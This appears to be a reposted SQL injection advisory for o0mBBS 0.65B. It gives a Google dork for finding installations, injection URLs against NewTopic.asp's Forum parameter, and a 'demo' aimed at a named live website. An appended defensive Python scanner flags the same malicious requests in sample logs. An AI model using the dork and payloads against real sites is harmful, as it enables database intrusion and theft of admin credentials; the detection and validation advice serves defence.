o0mBBS version 0.65B suffers from a remote SQL injection vulnerability.
932fd79684c4a385a2c9010ac80f8b8190f6edd02361ec162199122602d74062
# --------------------------------------- #
Author : L3b-r1'z
Title : o0mBBS Sql Injection
Date : 6/12/2012
Email : L3br1z@Gmail.com
Site : Sec4Ever.com & Exploit4arab.com
Google Dork : allintext: "o0mBBS version 0.65B"
Version : 0.65
# --------------------------------------- #
1) Bug
2) PoC
# --------------------------------------- #
1) Bug :
An Attacker Can Perform SQL Injection Against The Database And Steal The Username And Admin.
# --------------------------------------- #
2) PoC :
http://localhost/o0m/NewTopic.asp?Type=NewTopic&Forum=[SQL]
http://localhost/o0m/NewTopic.asp?Type=NewTopic&Forum=2'
Demo :
http://www.oasitech.it/o0m/NewTopic.asp?Type=NewTopic&Forum=2%27
# --------------------------------------- #
Thx To : I-Hmx , B0X , Hacker-1420 , Damane2011 , Sec4ever , The Injector ,
Over-X , Ked-Ans , N4SS1M , B07 M4ST3R , Black-ID , Abu Hamid Madridi.
# --------------------------------------- #
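
A defender-side check for the request pattern shown in the PoC, as an added example that is not part of the original advisory: it scans web-server log lines for NewTopic.asp requests whose Forum value is not a plain integer. The log layout, the sample lines and the assumption that Forum is always a numeric forum id are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in a simplified "client method uri status" layout
# (not real traffic; 192.0.2.x and 198.51.100.x are documentation addresses).
SAMPLE_LOG = """\
192.0.2.10 GET /o0m/NewTopic.asp?Type=NewTopic&Forum=2 200
192.0.2.44 GET /o0m/NewTopic.asp?Type=NewTopic&Forum=2%27 500
192.0.2.44 GET /o0m/newtopic.asp?type=NewTopic&forum=2' 500
198.51.100.7 GET /o0m/NewTopic.asp?Type=NewTopic 200
198.51.100.7 GET /o0m/Default.asp?Forum=abc 200
192.0.2.10 GET /o0m/NewTopic.asp?Forum=7&Forum=x 200
"""

# Assumption: a legitimate Forum value is a small positive integer.
FORUM_ID = re.compile(r"[0-9]{1,9}")


def suspicious_forum_values(uri):
    """Return decoded Forum values of a NewTopic.asp request that are not plain integers."""
    parts = urlsplit(uri)
    if not parts.path.lower().endswith("/newtopic.asp"):
        return []
    # ASP reads parameter names case-insensitively, so compare them lowercased.
    query = parse_qs(parts.query, keep_blank_values=True)
    values = [v for k, vs in query.items() if k.lower() == "forum" for v in vs]
    return [v for v in values if not FORUM_ID.fullmatch(v)]


def scan(log_text):
    """Return (client, uri, bad_values) for each line carrying a non-numeric Forum value."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # not in the constructed four-field layout
        client, _method, uri, _status = fields
        bad = suspicious_forum_values(uri)
        if bad:
            hits.append((client, uri, bad))
    return hits


if __name__ == "__main__":
    for client, uri, bad in scan(SAMPLE_LOG):
        print(f"{client} {uri} -> non-numeric Forum value(s): {bad}")
```

The same allow-list (digits only) is the input validation the application itself should apply to Forum before the value reaches a query, alongside parameterized statements.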